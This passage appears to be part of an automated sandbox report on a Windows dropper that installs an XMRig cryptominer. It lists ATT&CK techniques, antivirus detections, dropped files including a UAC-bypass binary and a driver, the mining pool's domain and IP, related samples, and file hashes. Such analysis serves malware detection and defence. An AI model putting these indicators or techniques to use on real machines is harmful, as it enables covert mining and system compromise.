Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Code function: 5_2_00007FF6FE425160 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00007FF6FE425160

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Windows Service	1 Windows Service	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	721 Process Injection	1 Disable or Modify Tools	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	1 Abuse Elevation Control Mechanism	721 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
GcqJPBLD2Q.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
GcqJPBLD2Q.exe	100%	Avira	TR/Dropper.Gen
GcqJPBLD2Q.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	100%	Avira	HEUR/AGEN.1344832
C:\Users\user\AppData\Local\Temp\Cool.exe	100%	Avira	HEUR/AGEN.1344202
C:\Users\user\AppData\Local\Temp\services64.exe	100%	Avira	HEUR/AGEN.1344202
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Cool.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\services64.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	5%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool.hashvault.pro	45.76.89.70	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://xmrig.com/wizard%s	conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/docs/algorithms	conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://xmrig.com/benchmark/%s	conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2291247009.00000151C5061000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/wizard	conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2291247009.00000151C5061000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000007.00000002.2190959451.00000236C70F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.76.89.70	pool.hashvault.pro	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528492
Start date and time:	2024-10-08 00:16:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GcqJPBLD2Q.exe renamed because original name is a hash value
Original Sample Name:	831c0b3184feb755997ee1ec5e474ca8.exe
Detection:	MAL
Classification:	mal100.expl.evad.mine.winEXE@52/21@1/1
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 118 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.134, 40.126.32.136, 20.190.160.20, 20.190.160.14, 40.126.32.72, 40.126.32.68, 40.126.32.76, 20.190.160.22, 13.89.179.12
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target GcqJPBLD2Q.exe, PID 5160 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6684 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: GcqJPBLD2Q.exe

Simulations

Behavior and APIs

Time	Type	Description
00:16:59	Task Scheduler	Run new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
18:16:55	API Interceptor	1x Sleep call for process: Cool.exe modified
18:16:57	API Interceptor	5387x Sleep call for process: conhost.exe modified
18:16:58	API Interceptor	41x Sleep call for process: powershell.exe modified
18:17:00	API Interceptor	3x Sleep call for process: services64.exe modified
18:17:02	API Interceptor	3x Sleep call for process: sihost64.exe modified
18:20:17	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
45.76.89.70	file.exe	Get hash	malicious	Xmrig	Browse
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
	System.exe	Get hash	malicious	Xmrig	Browse
	Update.exe	Get hash	malicious	Blank Grabber, Redline Clipper, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	gutpOKDunr.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.FileRepMalware.3253.21057.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pool.hashvault.pro	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	45.76.89.70
	file.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, Xmrig, zgRAT	Browse	142.202.242.43
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	95.179.241.203
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	142.202.242.45
	System.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	Update.exe	Get hash	malicious	Blank Grabber, Redline Clipper, Xmrig	Browse	45.76.89.70
	66dd2c2d3b88f_opera.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	na.elf	Get hash	malicious	Mirai	Browse	66.42.126.39
	z3hir.x86.elf	Get hash	malicious	Mirai	Browse	44.172.145.8
	arm7-20241006-0950.elf	Get hash	malicious	Unknown	Browse	108.61.212.64
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	155.138.145.67
	Setup.exe	Get hash	malicious	Unknown	Browse	45.32.1.23
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	136.244.88.135
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	108.61.168.124
	https://bit.ly/4eqfXtg	Get hash	malicious	Unknown	Browse	80.240.30.52
	https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_ios	Get hash	malicious	Unknown	Browse	95.179.215.24
	https://www.allegiantair.com/deals//smsgiveaway	Get hash	malicious	Unknown	Browse	207.148.0.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	TwrhjEKqxk.exe	Get hash	malicious	Xmrig	Browse
	aA45th2ixY.exe	Get hash	malicious	Xmrig	Browse
	1mqzOM6eok.exe	Get hash	malicious	Xmrig	Browse
	updater.exe	Get hash	malicious	Xmrig	Browse
	7QiAmg58Jk.exe	Get hash	malicious	Metasploit, Meterpreter, Xmrig	Browse
	LnK0dS8jcA.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse
	S0FTWARE.exe	Get hash	malicious	Go Injector, Vidar, Xmrig	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_conhost.exe_bcf865d76fe77467e295cbb71eb4f98b4a9050eb_1260788c_f2492fca-a4a7-4d85-a745-6ca7b235bc24\Report.wer

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0136144947722001
Encrypted:	false
SSDEEP:	96:UI3uFA2aFXsHh/zxymApQXIDcQCc6lcE4cw3uc1+HbHgrZ9n3g4sP8q9sOyPt2gr:Uguu2GXUz08hiIjVbkAzuiF3Z24lO86
MD5:	BE314ED4F74A781D5D17F40FBCE98303
SHA1:	54340D96581AD8252E4454068159D379BBA4548E
SHA-256:	CF4C0C4F7BC0819893166937DD0BF25DACAD1753294EB9EA05229DEBAE95387D
SHA-512:	B867E9B43213C90DFBF8E674F0A31695CC0368F9FABC849E68AC77F08040182A6A45F522CA12B0F67504179734298DDABCF47C4A2D8481DCA57FDAF5105E9DE3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.1.3.2.1.2.6.3.9.9.2.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.1.3.2.1.4.8.8.9.9.2.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.4.9.2.f.c.a.-.a.4.a.7.-.4.d.8.5.-.a.7.4.5.-.6.c.a.7.b.2.3.5.b.c.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.c.a.4.4.8.e.-.7.2.d.3.-.4.d.b.2.-.a.3.5.1.-.2.f.4.7.9.e.1.2.f.0.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.o.n.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.O.N.H.O.S.T...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.c.-.0.0.0.1.-.0.0.1.5.-.a.2.3.f.-.c.2.a.4.0.6.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.2.a.7.2.7.4.a.0.b.4.f.9.4.9.3.6.3.2.0.6.0.f.e.2.5.9.9.3.a.2.e.f.2.4.f.e.8.2.7.!.c.o.n.h.o.s.t...e.x.e.....T.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER684F.tmp.dmp

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Oct 7 22:20:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	894684
Entropy (8bit):	3.8532657447784557
Encrypted:	false
SSDEEP:	6144:Ds6HXFXNz2ka8Cveh5YRdvlt5jAaqO3Qx:DzFdzKeh5YR/t5jAaqOQx
MD5:	7E09C6A66018CB3482B3B23591E93A32
SHA1:	C3D753FB80E440D4F5550FB98DECA03ED6EE73CB
SHA-256:	6E5D07E7B4B52391701BB787F97BE7BE3E2E676C264EAC3867F263C77D11EC8A
SHA-512:	7C9AE8901F166A3B3858E2643160AFE95F306004CB841A3B1DE703BD9B2B1F3E85223C77AEBA90F334CC8515C3001EF4F72C3C7C6D3C12563A5F67080805C217
Malicious:	false
Preview:	MDMP..a..... ........^.g............T...............h.......`............o..zU..........`.......8...........T...........P)...}..........P&..........<(..............................................................................eJ.......(......Lw......................T.......\|....].g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7001.tmp.WERInternalMetadata.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6872
Entropy (8bit):	3.721733478754813
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb2iEYNE4UhQlyO5aMQUO89bXADNLSf/CGm:R6l7wVeJ2iEYNE4U12pDO89bXAVSf/dm
MD5:	7F38EFBEE58236BD3D41FAD187860ECB
SHA1:	8035FCF66BB6E79E9AE25CD0DEF24F59FE6E7448
SHA-256:	633B763CE8264EC29731C7D675ACE5CB3A34C68A40E4F42F24AFD7DACFF3008C
SHA-512:	8689807719EC09A755D5CFC9D88DBB22512D1257868208394255EE9C293DA5CC08568EB81EEE135834D7983C6CB00C94A583636B5E54D9B1F26392EEECC7D8D1
Malicious:	false
